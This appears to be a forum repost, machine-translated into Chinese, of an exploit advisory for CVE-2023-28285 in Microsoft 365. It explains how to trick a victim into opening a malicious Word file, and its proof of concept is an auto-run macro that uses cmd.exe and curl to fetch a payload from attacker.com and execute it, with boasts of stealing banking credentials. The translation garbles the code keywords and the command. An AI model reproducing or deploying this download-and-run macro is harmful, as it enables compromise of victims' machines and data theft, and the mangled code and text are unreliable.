H

Microsoft 365 MSO(版本2305构建16.0.16501.20074)64位- 远程代码执行(RCE)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
## title: Microsoft 365 MSO(版本2305构建16.0.16501.20074)64位- 远程代码执行(RCE)
##作者: nu11secur1ty
## date: 04.17.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/
##参考: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28285
## Description:
攻击本身是由具有身份验证的用户本地进行的
到目标系统。攻击者可以通过
通过社会工程说服受害者下载并打开
网站上专门制作的文件,可能导致本地
攻击受害者的计算机。攻击者可以欺骗受害者
通过使用恶意的“ word”文件打开恶意网页
Office-365 API。用户将打开文件以读取该文件后
Office-365的API,没有被问及要激活什么,
等等,他将激活恶意服务器的代码,他将
他自己从这台恶意服务器注入。此后
单击,攻击者可以收到非常敏感的信息!用于银行
帐户,一些嗅探攻击的日志,跟踪所有流量
受害者没有停止,还有更多恶意的东西,这取决于
场景和等
状态:高脆弱性
[+] exploit:
当受害者的那一刻,利用服务器必须在广播中进行广播
点击漏洞的按钮!
[+] POC:
``cmd
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
http://attacker.com/cve-2023-28285/poc.debelui | Debelui',
vbnormalfocus)
结束子
````````
## fyi:
POC有一个价格,该报告将上传
描述和视频只能复制它。
##复制:
[HREF](https://github.com/nu11secur1ty/cve-mitre/tree/main/main/main/2023/cve-2023-28285)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)
##时间花费:
01:30:00
 
后退
顶部